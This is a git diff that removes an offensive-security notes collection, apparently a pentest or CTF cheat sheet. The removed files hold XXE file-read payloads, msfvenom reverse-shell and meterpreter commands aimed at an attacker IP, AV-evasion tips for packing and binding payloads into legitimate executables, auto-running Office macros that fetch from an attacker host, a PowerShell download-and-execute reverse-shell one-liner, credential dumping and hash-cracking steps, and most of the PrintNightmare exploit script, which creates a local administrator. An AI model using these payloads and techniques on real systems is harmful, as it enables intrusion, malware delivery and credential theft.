@@ -1,78 +0,0 @@
-# XML External Entity (XXE)
-
-An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.
-
-There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
-1. An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.
-
-2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
-
-## Document Type Definition (DTD)
-A DTD defines the structure and the legal elements and attributes of an XML document.
-
-* Example file content of `note.dtd`
-```
-<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>
-```
-* !DOCTYPE note -  Defines a root element of the document named note
-* !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"
-* !ELEMENT to - Defines the `to` element to be of type "#PCDATA"
-* !ELEMENT from - Defines the `from` element to be of type "#PCDATA"
-* !ELEMENT heading  - Defines the `heading` element to be of type "#PCDATA"
-* !ELEMENT body - Defines the `body` element to be of type "#PCDATA"
-
-    
-    NOTE: #PCDATA means parseable character data.
-
-* Resulting XML doc follows
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE note SYSTEM "note.dtd">
-<note>
-    <to>falcon</to>
-    <from>feast</from>
-    <heading>hacking</heading>
-    <body>XXE attack</body>
-</note>
-```
-
-## Replacing XML content
-* Name in the example
-```xml
-<!DOCTYPE replace [<!ENTITY name "feast"> ]>
- <userInfo>
-  <firstName>falcon</firstName>
-  <lastName>&name;</lastName>
- </userInfo>
-```
-* System call inside entity
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
-<root>
-<name>sdafsa</name>
-<tel>789731421</tel>
-<email>&xxe;</email>
-<password>12345</password>
-</root>
-```
-```xml
-<?xml version="1.0"?>
-<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
-<root>&read;</root>
-```
-
-* PHP expect using syscalls
-```xml
-<?xml version="1.0"?>
-<!DOCTYPE foo [ <!ELEMENT foo ANY >
-<!ENTITY xxe SYSTEM "expect://id" >]>
-<root>
-    <email>&xxe;</email>
-    <password>12345</password>
-</root>
-```
-
-
-## Tools
-* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe)
diff --git a/exploit/web/xxe/xxeserv b/exploit/web/xxe/xxeserv
deleted file mode 160000
index 046c559..0000000
--- a/exploit/web/xxe/xxeserv
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 046c559a3c1a65d3a41a2fb706807b9e48e66563
diff --git a/exploit/windows/CrackMapExec b/exploit/windows/CrackMapExec
deleted file mode 160000
index a8df4c2..0000000
--- a/exploit/windows/CrackMapExec
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit a8df4c2a868378576f3b959261ad756e06ed3749
diff --git a/exploit/windows/Portable Executables/Shellcode.md b/exploit/windows/Portable Executables/Shellcode.md
deleted file mode 100644
index 919f9ad..0000000
--- a/exploit/windows/Portable Executables/Shellcode.md	
+++ /dev/null
@@ -1,95 +0,0 @@
-# PE Shellcode
-
-## General PE Information
-
-* [PE structure](../../../reverse engineering/windows/portable-executable.md)
-
-## Inserting Shellcode
-
-Multiple sections inside the PE can be used to insert the shellcode. This is defined by how the shellcode variable is initialized. When the shellcode is defined as 
-* A __local variable__ inside the main function it will be stored in the `.text` section
-* A __global variable__ it will be stored in the `.data` section
-* A __raw binary__ in an icon image and referencing it will store it in the `.rsrc` section
-* A __custom data section__ it is stored in this unusual section
-
-## Crafting Shellcode
-
-* Use msfvenom to generate shellcode which executes the calculator
-```sh
-msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f c -o stage.c
-```
-* Fill in the the missing parts to make it a valid c file
-```sh
-sed -i '1s/^/#include <windows.h>\n/' stage.c
-sed -i 's/=/= {/' stage.c
-sed -i 's/;/};/' stage.c
-echo -e "int main (void) {\n\tDWORD _protect;\n\tVirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READ, &_protect);\n\tint (*shellcode)() = (int(*)())(void *)buf;\n\tshellcode();\n\treturn 0;\n}" >> stage.c
-```
-
-* Compile it
-```sh
-i686-w64-mingw32-gcc stage.c -o vcalc.exe
-```
-
-### Compile C# 
-
-The Microsoft Visual C# compiler is called via
-```sh
-csc file.cs
-```
-
-## Staged C2
-
-* The stage on the target needs to download further parts of the shell into memory
-* These parts may be generated in one of the following ways (all of them will be found through AV)
-```sh
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shell.bin -b '\x00\x0a\x0d'
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shellcode.bin -b '\x00' -e x86/shikata_ga_nai -i 3 -f csharp
-msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe --encrypt xor --encrypt-key "verysecretkey" -o xored-revshell.exe
-```
-* Generate certificate for the webserver
-```sh
-openssl req -new -x509 -keyout webserver.pem -out webserver.pem -days 365 -nodes
-```
-* Start the webserver
-```sh
-sudo python -c "import http.server, ssl;server_address=('0.0.0.0',443);httpd=http.server.HTTPServer(server_address,http.server.SimpleHTTPRequestHandler);httpd.socket=ssl.wrap_socket(httpd.socket,server_side=True,certfile='webserver.pem',ssl_version=ssl.PROTOCOL_TLSv1_2);httpd.serve_forever()"
-```
-
-## Generate Custom Shellcode
-
-* The target is to bypass the AV
-
-### Xor and Encode
-
-```sh
-msfvenom LHOST=$ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp
-```
-* Xor and encode the payload, decode the payload on target before it is executed
-
-### Packer 
-
-* Compress and obfuscate shellcode inside a binary
-* Obviously, an unpacker is needed inside the binary in addition to the packed code
-* [mkaring's confuserx](https://github.com/mkaring/ConfuserEx)
-    * Select the directory and binary
-    * Go to settings, use packet and create Rules
-    * Edit the rule as well
-    * Go to Protect and click the button
-
-### Binding
-
-* Used to merge binaries
-* Shellcode will be merged into a legitimate PE and run as an additional thread
-```sh
-msfvenom -x legitimate.exe -k -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4711 -f exe -o notsolegitimate.exe
-```
-* Binded PEs need some disguising as well
-
-## Tools & Tipps
-
-* [hasherezade's PE-bear](https://github.com/hasherezade/pe-bear-releases.git) gives an overview of the PE's sections  
-* [asmtutor.com](https://asmtutor.com)
-* [mvelazc0's staged payload](https://github.com/mvelazc0/defcon27_csharp_workshop/blob/master/Labs/lab2/2.cs)
-
-
diff --git a/exploit/windows/dll_hijacking/dll_hijacking.md b/exploit/windows/dll_hijacking/dll_hijacking.md
deleted file mode 100644
index a4d29ce..0000000
--- a/exploit/windows/dll_hijacking/dll_hijacking.md
+++ /dev/null
@@ -1,42 +0,0 @@
-# DLL Hijacking
-
-## Search Orders
-* __SafeDllSearchMode__ enabled searches paths in following order: 
-    * __cwd__ of executable
-    * System directory, `GetSystemDirectory`
-    * 16-bit system directory 
-    * Windows, `GetWindowsDirectory`
-    * __pwd__
-    * PATH
-
-* __SafeDllSearchMode__ disabled searches in following order:
-    * __cwd__ of executable
-    * __pwd__ 
-    * System directory
-    * 16-bit system directory
-    * Windows directory 
-    * PATH environment variable
-
-## Template
-```C
-#include <windows.h>
-
-BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
-    if (dwReason == DLL_PROCESS_ATTACH) {
-        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
-        ExitProcess(0);
-    }
-    return TRUE;
-}
-```
-* Compilation via
-```sh
-x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
-```
-* Upload to target
-* Restart dllsvervice via
-```sh
-sc stop dllsvc
-sc start dllsvc
-```
-
diff --git a/exploit/windows/dll_hijacking/hijackdll.c b/exploit/windows/dll_hijacking/hijackdll.c
deleted file mode 100644
index 62dc5d0..0000000
--- a/exploit/windows/dll_hijacking/hijackdll.c
+++ /dev/null
@@ -1,14 +0,0 @@
-// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
-// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
-
-#include <windows.h>
-
-BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
-    if (dwReason == DLL_PROCESS_ATTACH) {
-        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
-        ExitProcess(0);
-    }
-    return TRUE;
-}
-
-
diff --git a/exploit/windows/dll_hijacking/output.dll b/exploit/windows/dll_hijacking/output.dll
deleted file mode 100755
index da4cc1e..0000000
Binary files a/exploit/windows/dll_hijacking/output.dll and /dev/null differ
diff --git a/exploit/windows/docs/always_installed_elevated.md b/exploit/windows/docs/always_installed_elevated.md
deleted file mode 100644
index 9b01319..0000000
--- a/exploit/windows/docs/always_installed_elevated.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# AlwaysInstalledElevated
-
-* Watch out for `AlwaysInstalledElevated` keys inside the registry via
-```sh
-reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
-reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
-```
-* Prepare reverse shell on attacker as an msi file
-```
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi
-```
-* start the msi on target
-```sh
-msiexec /quiet /qn /i C:\Temp\shell.msi
-```
-
-## Set Registry Keys
-* Alternative method
-```sh
-reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
-reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
-```
-
-
diff --git a/exploit/windows/docs/crackmapexec.md b/exploit/windows/docs/crackmapexec.md
deleted file mode 100644
index 6517e6b..0000000
--- a/exploit/windows/docs/crackmapexec.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# crackmapexec
-
-* In general, the syntax is as follows
-```sh
-crackmapexec smb $DOMAIN -u <user> -p <password>
-```
-* Do not set the domain at the end, it won't work.
-
-
diff --git a/exploit/windows/docs/dpapi.md b/exploit/windows/docs/dpapi.md
deleted file mode 100644
index 8ea8716..0000000
--- a/exploit/windows/docs/dpapi.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# DPAPI
-
-* [Jarno Baselier](https://jarnobaselier-nl.translate.goog/crack-dpapi-met-cqure-cqtools/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=nui)
-* [Insecurity's take](https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/#The_DPAPILAB-NG_Toolset)
-* [tinyapps' replace and recover domian cached credentials](https://tinyapps.org/docs/domain-cached-credentials.html)
-* [ired's reading dpapi encrypted secrets with mimikatz and c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++)
-
-## Tools
-
-* [tjldeneut's dpaping-lab](https://github.com/tijldeneut/dpapilab-ng.git)
-* [BlackDiverX's unpacked cqtools]( https://github.com/BlackDiverX/cqtools)
-* Use [CQTools](https://github.com/paulacqure/CQTools.git) with care, __CQMasterKeyAD.exe__ does not work correctly. It will drive you mad. Here is the workaround
-Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
-    * Get the pvk backup key from the DC via mimikatz
-    * Get the entropy via `CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe`
-    * Get the encrypted blob
-    * Get the user's Masterkey under `C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\`
-    * Use dpapilab-ng's `keepassdec.py`
-```sh
-./keepassdec.py  --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk  --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin 
-```
-    * Use the decrypted blob to 
-```sh
-CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx
-```
-* Open the `*.kdbx` file
-
diff --git a/exploit/windows/docs/impacket.md b/exploit/windows/docs/impacket.md
deleted file mode 100644
index b8c7297..0000000
--- a/exploit/windows/docs/impacket.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# Impacket
-
-* [Repo](https://github.com/SecureAuthCorp/impacket)
-
-## Secretsdump
-* `ntds.dit` and `system.hive` are needed
-```sh
-secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt
-````
-* Remove everything but the hashes
-* Use it to log in on the target
-```sh
-crackmapexec smb $TARGET_IP -u <user> -H hashes.txt
-```
diff --git a/exploit/windows/docs/llmnr.md b/exploit/windows/docs/llmnr.md
deleted file mode 100644
index ae775a1..0000000
--- a/exploit/windows/docs/llmnr.md
+++ /dev/null
@@ -1,20 +0,0 @@
-# Link Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS)
-
-* __LLMNR__, name resolutions inside the local domain for other hosts
-* __NBT-NS__, identifying hosts in the network by NetBIOS names
-
-* Impersonating the actual service to get credentials
-
-## Usage
-
-* From [responder](./responder.md)
-```sh
-sudo responder -I <NIC> -rdw -v 
-```
-
-* Dictionary attack on catched password
-```sh
-hashcat -m 5600 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule
-```
-
-
diff --git a/exploit/windows/docs/lnk_exploit.md b/exploit/windows/docs/lnk_exploit.md
deleted file mode 100644
index 6addcb0..0000000
--- a/exploit/windows/docs/lnk_exploit.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# .lnk exploit
-
-* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
-* [mamachine's tool](http://mamachine.org/mslink/index.en.html)
-
-* Target does not even have to open the link directly
-
-```sh 
-mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
-```
-* Start a responder and wait for user's hash
-```sh
-responder -I eth0
-```
diff --git a/exploit/windows/docs/pass_the_hash.md b/exploit/windows/docs/pass_the_hash.md
deleted file mode 100644
index 6639a00..0000000
--- a/exploit/windows/docs/pass_the_hash.md
+++ /dev/null
@@ -1,7 +0,0 @@
-# Pass the Hash
-
-* Authenticate with retrieved hash
-* User evil-winrm or
-```
-pth-winexe -U 'admin%hash' //<target-IP> cmd.exe
-```
diff --git a/exploit/windows/docs/password_in_registry.md b/exploit/windows/docs/password_in_registry.md
deleted file mode 100644
index 729e4a6..0000000
--- a/exploit/windows/docs/password_in_registry.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Password Inside Registry Key
-
-* Query passwords saved inside the registry
-```sh
-reg query HKLM /f password /t REG_SZ /s
-```
-* Admin Autologon credentials
-```
-reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
-```
-* On attacker, change the credentials on target
-```sh
-winexe -U 'admin%password' //<target-IP> cmd.exe
-```
-
-## List other Creds
-```
-cmdkey /list
-```
-* Open reverse shell
-```sh
-runas /savecred /user:admin C:\shell.exe
-```
-
-
diff --git a/exploit/windows/docs/potatoes.md b/exploit/windows/docs/potatoes.md
deleted file mode 100644
index 2789fe6..0000000
--- a/exploit/windows/docs/potatoes.md
+++ /dev/null
@@ -1,7 +0,0 @@
-# Potatoes
-
-* [Hot Potato](https://foxglovesecurity.com/2016/01/16/hot-potato/)
-* [Rotten Potato](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
-* [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
-* [Juicy Potato](https://ohpe.it/juicy-potato/)
-* [Rogue Potato](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
diff --git a/exploit/windows/docs/printnightmare.md b/exploit/windows/docs/printnightmare.md
deleted file mode 100644
index b4f25e0..0000000
--- a/exploit/windows/docs/printnightmare.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Print Nightmare
-
-* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git)
-
-* Create virtual env inside cloned repo and install impacket
-```sh
-pip install .
-pip2 install .
-```
-
-* Create payload
-```sh
-msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll
-```
-
-* Prepare msf multi handler
-
-* Inside virtualenv
-```sh
-smbserver share $(pwd) -smb2support
-```
-
-* Roll the exploit
-```sh
-python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'
-```
-
diff --git a/exploit/windows/docs/responder.md b/exploit/windows/docs/responder.md
deleted file mode 100644
index 1eae577..0000000
--- a/exploit/windows/docs/responder.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Responder
-
-* [lgandx's repo](https://github.com/lgandx/Responder.git)
-
-Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication
-
-## Usage
-```sh
-responder -I tun0 -wrvd
-```
diff --git a/exploit/windows/docs/unquoted_path.md b/exploit/windows/docs/unquoted_path.md
deleted file mode 100644
index 5839430..0000000
--- a/exploit/windows/docs/unquoted_path.md
+++ /dev/null
@@ -1,56 +0,0 @@
-# Unquoted Path
-
-* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
-* Some part of path has to be writeable, windows tries to insert `.exe` instead of a space.
-* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
-* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
-
-## Enumeration
-
-* Check paths
-```sh
-wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
-```
-
-* Check permissions on these paths
-```
-cacls "c:\program files\directory"
-powershell -c "Get-WMIObject -Class Win32_Service -Filter \"Name='<service name>'\" | select-object *"
-```
-
-## Example
-* The unquoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
-```sh
-copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
-```
-```sh
-net start <service>
-```
-
-## Intel about Service
-
-* Access should contain writeable
-```sh
-Get-Acl -Path <path> | Format-List
-```
-
-* Save the script [Get-ServiceAcl.ps1](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) and `Import-Module Get-ServiceAcl.ps1`
-
-* Check `ServiceRights` via
-```sh
-"<servicename>" | Get-ServiceAcl | select ExpandProperty Access
-```
-
-## Interacting with the Service
-
-* Upload msfvenom shell to the writeable path, setup listener and 
-```sh
-sc start "servicename"
-Stop-Service -name "servicename"
-Start-Service -name "servicename"
-```
-
-## PoC
-
-* [MattyMcFatty's PoC](https://github.com/mattymcfatty/unquotedPoC.git)
-
diff --git a/exploit/windows/impacket b/exploit/windows/impacket
deleted file mode 160000
index 3c6713e..0000000
--- a/exploit/windows/impacket
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 3c6713e309cae871d685fa443d3e21b7026a2155
diff --git a/exploit/windows/macros/macros.md b/exploit/windows/macros/macros.md
deleted file mode 100644
index ec2f7d4..0000000
--- a/exploit/windows/macros/macros.md
+++ /dev/null
@@ -1,38 +0,0 @@
-# Macros
-
-* Executes after user clicks enable content
-
-* Open Excel
-* View --> Macros --> Create New Macros 
-
-```c
-Sub HelloWorld()
-    PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://%ATTACKER_IP%/passwd -OutFile C:\passwd", vbNormalFocus)
-End Sub
-
-Sub Auto_Open()
-    HelloWorld
-End Sub
-```
-
-## Meterpreter
-
-* Directly execute shell without user interaction
-* Configure and run `use windows/misc/hta_server`
-* Macro executes `mshta.exe`
-```c
-Sub HelloWorld()
-    PID = Shell("mshta.exe https://%ATTACKER_IP%:8080/c9496fz.hta")
-End Sub
-
-Sub Auto_Open()
-    HelloWorld
-End Sub
-```
-
-## Msfvenom
-
-* Create reverse shell via 
-```sh
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=443 -f vba -o surprise.vba
-```
diff --git a/exploit/windows/payloads/windows_scripting_host.md b/exploit/windows/payloads/windows_scripting_host.md
deleted file mode 100644
index 7d810b9..0000000
--- a/exploit/windows/payloads/windows_scripting_host.md
+++ /dev/null
@@ -1,92 +0,0 @@
-# Windows Scripting Host (WSH)
-
-
-## Visual Basic Script (VB Script)
-* `cscript file.exe`, command line scripts
-* `wscript file.exe`, UI scripts
-
-* Example (watch out for the whitespace after path, it has to be included)
-```sh
-Set shell = WScript.CreateObject("Wscript.Shell")
-shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True
-```
-```sh
-c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
-```
-
-## Visual Basic for Application (VBA)
-* Access Windows API via Macros
-* Open Word, `view` --> `macros`, give a name and select document in `Macros in`
-* Create reverse shell
-```sh
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
-```
-* Insert into the following Macro Content, `Workbook_Open()` for excel, `Document_Open()` for Word macros
-```sh
-Sub Document_Open()
-  SHELL
-End Sub
-
-Sub AutoOpen()
-  SHELL
-End Sub
-
-Sub SHELL()
-    <reverse shell goes here>   
-End Sub
-```
-
-## HTML Application (HTA)
-
-* HTML file including some kind of scripting language like JS, VB, ActiveX
-* `mshta` is used to excecute
-
-### POC
-* Download file via attacker's web server
-* File should look like
-```HTML
-<html>
-  <body>
-    <script>
-	    var shell= 'cmd.exe'
-	    new ActiveXObject('WScript.Shell').Run(shell);
-    </script>
- </body>
-</html>
-```
-* Save Document in a macros supporting file format like `Word 97-2003 Template` and `Word 97-2003 Document`
-
-
-### Reverse Shell
-* Craft reverse shell via `msfvenom`
-```sh
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta        
-```
-* `msfconsole` via
-```sh
-use exploit/windows/misc/hta_server
-```
-
-## Powershell
-
-* Powershell execution policy can be checked via
-```sh
-Get-ExecutionPolicy
-```
-* Set policy via
-```sh
-Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
-```
-* Bypass via
-```sh
-powershell -ex bypass -File shell.ps1
-```
-* Load [powercat](https://github.com/besimorhino/powercat.git) on attacker machine and load it on the target via
-```sh
-C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
-```
-* Or use msfvenom
-```sh
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
-```
-
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/CVE-2021-1675.ps1 b/exploit/windows/print_nightmare/CVE-2021-1675/CVE-2021-1675.ps1
deleted file mode 100644
index 106ddf5..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/CVE-2021-1675.ps1
+++ /dev/null
@@ -1,798 +0,0 @@
-function Invoke-Nightmare
-{
-    <#
-        .SYNOPSIS
-        Exploits CVE-2021-1675 (PrintNightmare)
-
-        Authors:
-            Caleb Stewart - https://github.com/calebstewart
-            John Hammond - https://github.com/JohnHammond
-        URL: https://github.com/calebstewart/CVE-2021-1675
-
-        .DESCRIPTION
-        Exploits CVE-2021-1675 (PrintNightmare) locally to add a new local administrator
-        user with a known password. Optionally, this can be used to execute your own
-        custom DLL to execute any other code as NT AUTHORITY\SYSTEM.
-
-        .PARAMETER DriverName
-        The name of the new printer driver to add (default: "Totally Not Malicious")
-
-        .PARAMETER NewUser
-        The name of the new user to create when using the default DLL (default: "adm1n")
-
-        .PARAMETER NewPassword
-        The password for the new user when using the default DLL (default: "P@ssw0rd")
-
-        .PARAMETER DLL
-        The DLL to execute when loading the printer driver (default: a builtin payload which
-        creates the specified user, and adds the new user to the local administrators group).
-
-        .EXAMPLE
-        > Invoke-Nightmare
-        Adds a new local user named `adm1n` which is a member of the local admins group
-
-        .EXAMPLE
-        > Invoke-Nightmare -NewUser "caleb" -NewPassword "password" -DriverName "driver"
-        Adds a new local user named `caleb` using a printer driver named `driver`
-
-        .EXAMPLE
-        > Invoke-Nightmare -DLL C:\path\to\
-
-    #>
-    param (
-        [string]$DriverName = "Totally Not Malicious",
-        [string]$NewUser = "",
-        [string]$NewPassword = "",
-        [string]$DLL = ""
-    )
-
-    if ( $DLL -eq "" ){
-        $nightmare_data = [byte[]](get_nightmare_dll)
-        $encoder = New-Object System.Text.UnicodeEncoding
-
-        if ( $NewUser -ne "" ) {
-            $NewUserBytes = $encoder.GetBytes($NewUser)
-            [System.Buffer]::BlockCopy($NewUserBytes, 0, $nightmare_data, 0x32e20, $NewUserBytes.Length)
-            $nightmare_data[0x32e20+$NewUserBytes.Length] = 0
-            $nightmare_data[0x32e20+$NewUserBytes.Length+1] = 0
-        } else {
-            Write-Host "[+] using default new user: adm1n"
-        }
-
-        if ( $NewPassword -ne "" ) {
-            $NewPasswordBytes = $encoder.GetBytes($NewPassword)
-            [System.Buffer]::BlockCopy($NewPasswordBytes, 0, $nightmare_data, 0x32c20, $NewPasswordBytes.Length)
-            $nightmare_data[0x32c20+$NewPasswordBytes.Length] = 0
-            $nightmare_data[0x32c20+$NewPasswordBytes.Length+1] = 0
-        } else {
-            Write-Host "[+] using default new password: P@ssw0rd"
-        }
-
-        $DLL = [System.IO.Path]::GetTempPath() + "nightmare.dll"
-        [System.IO.File]::WriteAllBytes($DLL, $nightmare_data)
-        Write-Host "[+] created payload at $DLL"
-        $delete_me = $true
-    } else {
-        Write-Host "[+] using user-supplied payload at $DLL"
-        Write-Host "[!] ignoring NewUser and NewPassword arguments"
-        $delete_me = $false
-    }
-
-    $Mod = New-InMemoryModule -ModuleName "A$(Get-Random)"
-
-    $FunctionDefinitions = @(
-      (func winspool.drv AddPrinterDriverEx ([bool]) @([string], [Uint32], [IntPtr], [Uint32]) -Charset Auto -SetLastError),
-      (func winspool.drv EnumPrinterDrivers([bool]) @( [string], [string], [Uint32], [IntPtr], [UInt32], [Uint32].MakeByRefType(), [Uint32].MakeByRefType()) -Charset Auto -SetLastError)
-    )
-
-    $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Mod'
-
-    # Define custom structures for types created
-    $DRIVER_INFO_2 = struct $Mod DRIVER_INFO_2 @{
-        cVersion = field 0 Uint64;
-        pName = field 1 string -MarshalAs @("LPTStr");
-        pEnvironment = field 2 string -MarshalAs @("LPTStr");
-        pDriverPath = field 3 string -MarshalAs @("LPTStr");
-        pDataFile = field 4 string -MarshalAs @("LPTStr");
-        pConfigFile = field 5 string -MarshalAs @("LPTStr");
-    }
-
-    $winspool = $Types['winspool.drv']
-    $APD_COPY_ALL_FILES = 0x00000004
-
-    [Uint32]($cbNeeded) = 0
-    [Uint32]($cReturned) = 0
-
-    if ( $winspool::EnumPrinterDrivers($null, "Windows x64", 2, [IntPtr]::Zero, 0, [ref]$cbNeeded, [ref]$cReturned) ){
-        Write-Host "[!] EnumPrinterDrivers should fail!"
-        return
-    }
-
-    [IntPtr]$pAddr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([Uint32]($cbNeeded))
-
-    if ( $winspool::EnumPrinterDrivers($null, "Windows x64", 2, $pAddr, $cbNeeded, [ref]$cbNeeded, [ref]$cReturned) ){
-        $driver = [System.Runtime.InteropServices.Marshal]::PtrToStructure($pAddr, [System.Type]$DRIVER_INFO_2)
-    } else {
-        Write-Host "[!] failed to get current driver list"
-        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAddr)
-        return
-    }
-
-    Write-Host "[+] using pDriverPath = `"$($driver.pDriverPath)`""
-    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAddr)
-
-    $driver_info = New-Object $DRIVER_INFO_2
-    $driver_info.cVersion = 3
-    $driver_info.pConfigFile = $DLL
-    $driver_info.pDataFile = $DLL
-    $driver_info.pDriverPath = $driver.pDriverPath
-    $driver_info.pEnvironment = "Windows x64"
-    $driver_info.pName = $DriverName
-
-    $pDriverInfo = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($driver_info))
-    [System.Runtime.InteropServices.Marshal]::StructureToPtr($driver_info, $pDriverInfo, $false)
-
-    if ( $winspool::AddPrinterDriverEx($null, 2, $pDriverInfo, $APD_COPY_ALL_FILES -bor 0x10 -bor 0x8000) ) {
-        if ( $delete_me ) {
-            Write-Host "[+] added user $NewUser as local administrator"
-        } else {
-            Write-Host "[+] driver appears to have been loaded!"
-        }
-    } else {
-        Write-Error "[!] AddPrinterDriverEx failed"
-    }
-
-    if ( $delete_me ) {
-        Write-Host "[+] deleting payload from $DLL"
-        Remove-Item -Force $DLL
-    }
-}
-
-function get_nightmare_dll
-{
